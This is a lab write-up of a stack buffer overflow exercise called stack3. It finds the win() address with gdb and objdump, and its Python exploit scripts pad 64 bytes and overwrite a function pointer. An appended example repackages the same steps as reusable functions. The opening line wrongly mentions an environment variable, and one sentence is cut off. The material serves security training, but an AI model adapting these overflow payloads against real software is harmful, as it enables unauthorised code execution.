The goal of this challenge is to find an environment variable for the
win() func and to overwrite the func pointer stored on the stack via a BOF.
Things to note
gets(buffer);: The vulnerable func. It reads a line from stdin but it doesn't check for buffer overrun → which makes it vulnerable to BOF-type attacks.
win(): Winning func. Once we overflow the buffer via gets(), we can print out the winning statement by pointing the func pointer on the stack to the win() address.
char buffer[64];: This limits our buffer length to 64 bytes → so we can enter more than 64 bytes to cause a BOF.
Finding win() Address
As the website's hints suggest, we can search for the win() address with gdb or objdump.
[gdb]
$ gdb -q stack3
(gdb) x win
0x8048424 <win>: 0x83e58955
[objdump]
$ objdump -t stack3 | grep win
08048424 g F .text 00000014 win
Let's create the following exploit with python:
[Exploit-1]
#!/usr/bin/python
padding = "A" * 60 # Giving 60 bytes of padding
padding += "BBBBCCCCDDDDEEEEFFFF" # Using different letters so the crash value tells us which 4-byte word landed on the func pointer
print padding
When we run this against the stack3 program, we now see the "modified" value is overwritten with 0x43434343 (0x43 = 'C').
So our offset value is 64 (60 + BBBB).
We have everything we need: offset value (=64) + address location for
[Exploit-2]
#!/usr/bin/python
# win() = 0x8048424
padding = "A" * 64
padding += "\x24\x84\x04\x08" # Little-endian
print padding
When we run this against stack3, we can successfully print out the winning statement.
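The two-step procedure above (marker probe to find the offset, then padding plus the little-endian win() address) written out as reusable functions. This is an added example and not the post's own script; it takes the win() address and the observed 0x43434343 value from the writeup, and the function and variable names are my own.

```python
#!/usr/bin/env python3
# Added example (not the original post's script): the offset-finding and
# payload-building steps of the writeup as plain functions, so each value
# can be checked rather than eyeballed.
import struct

WIN_ADDR = 0x8048424   # from the gdb/objdump output in the writeup


def build_probe(filler_len=60, markers="BCDEF"):
    """Step 1 payload: filler_len 'A's followed by 4-byte marker words
    (BBBBCCCCDDDD...) so the value the program reports reveals which
    word landed on the func pointer."""
    return b"A" * filler_len + b"".join(m.encode() * 4 for m in markers)


def offset_from_marker(probe, observed):
    """Step 2: given the probe and the 32-bit value the program printed
    (e.g. 0x43434343), return the offset of the overwritten pointer.
    The pointer is read as a little-endian word, so the observed value is
    packed little-endian before searching for the bytes it occupied."""
    word = struct.pack("<I", observed)
    idx = probe.find(word)
    if idx < 0:
        raise ValueError("observed value not found in probe")
    return idx


def build_payload(offset, target):
    """Step 3: pad up to the pointer, then append the target address
    little-endian (0x8048424 -> \\x24\\x84\\x04\\x08)."""
    return b"A" * offset + struct.pack("<I", target)


if __name__ == "__main__":
    probe = build_probe()
    # 0x43434343 is the value stack3 reported for this probe in the writeup
    off = offset_from_marker(probe, 0x43434343)
    print("offset:", off)                     # 64
    payload = build_payload(off, WIN_ADDR)
    print("payload:", payload)
    # To feed the binary, write the raw bytes rather than repr:
    #   import sys; sys.stdout.buffer.write(payload + b"\n")
```

Because 0x43434343 is the same byte repeated, endianness does not matter for this particular probe; the little-endian pack in offset_from_marker is what keeps the function correct for probes whose marker words are not symmetric.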
Thanks for reading!
- Stack 4 — Stack-based BOF: Basic 4